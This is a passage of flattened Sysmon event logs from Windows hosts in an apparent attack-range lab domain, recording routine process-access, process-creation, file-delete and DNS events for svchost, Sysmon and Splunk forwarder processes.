12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440053Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440052Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440051Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440050Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.540{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440049Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.540{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440048Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.540{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0217-6088-B528-00000000BA01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440047Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.540{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0217-6088-B528-00000000BA01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440046Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.540{42DC5269-0217-6088-B528-00000000BA01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440045Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.218{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3C622892D9EFD0735919330D4CD2C3,SHA256=08AAC8B68CDA0AAF637E9FF9AB7E6FFE17CFABB242F6E305D43F5D07D39E3B27,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440044Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.114{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440043Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.114{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291350Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:48.828{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D05E980EF297A678AE103BB87690D0,SHA256=CA83F3A2A6626504068708CDCF3371B09592CD216FFE613455E62484E874D0C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440091Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:45.792{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local56891- 10341000x8000000000000000440090Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.874{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0218-6088-B728-00000000BA01}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440089Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440088Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440087Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440086Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440085Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440084Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440083Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.873{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440082Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.872{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440081Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.872{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440080Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.872{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0218-6088-B728-00000000BA01}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440079Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.872{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0218-6088-B728-00000000BA01}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440078Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.872{42DC5269-0218-6088-B728-00000000BA01}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440077Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.343{42DC5269-0218-6088-B628-00000000BA01}65164692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440076Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.341{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2CCBB0C1B2ED1C1C79BCBE4F7D27323,SHA256=6E0F5D42D2BB605456E90C495CE381FCBA40982462D67708B8A7E87AC6EE74A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440075Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:48.283{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 